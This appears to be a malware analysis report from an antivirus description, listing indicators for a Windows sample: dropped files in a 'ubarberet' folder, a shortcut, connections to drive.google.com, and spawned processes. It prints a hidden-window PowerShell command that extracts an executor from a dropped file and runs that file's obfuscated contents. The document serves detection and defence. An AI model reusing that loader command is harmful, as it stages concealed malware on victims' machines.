Техническая информация
- wab.exe
- %LOCALAPPDATA%\ubarberet\liniesorteringer.pro
- %LOCALAPPDATA%\ubarberet\chauvinisters.ryg
- %LOCALAPPDATA%\ubarberet\behandlingsmaal.sac
- %LOCALAPPDATA%\ubarberet\fdegodser\kliniklokalernes.sun
- %LOCALAPPDATA%\ubarberet\fdegodser\potatory.rea
- %LOCALAPPDATA%\ubarberet\fdegodser\teda.txt
- %CommonProgramFiles(x86)%\ukases.lnk
- %LOCALAPPDATA%\ubarberet\fdegodser\<Имя файла>.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'drive.google.com':443
- 'pk#.goog':80
- 'microsoft.com':80
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- ClassName: '#32770' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden "$Afspejlingen=Get-Content '%LOCALAPPDATA%\Ubarberet\Chauvinisters.Ryg';$Inddrive=$Afspejlingen.SubString(60013,3);.$Inddrive($Afspejlingen)"
- '%WINDIR%\syswow64\cmd.exe' /c "set /A 1^^0"
- '%ProgramFiles(x86)%\windows mail\wab.exe'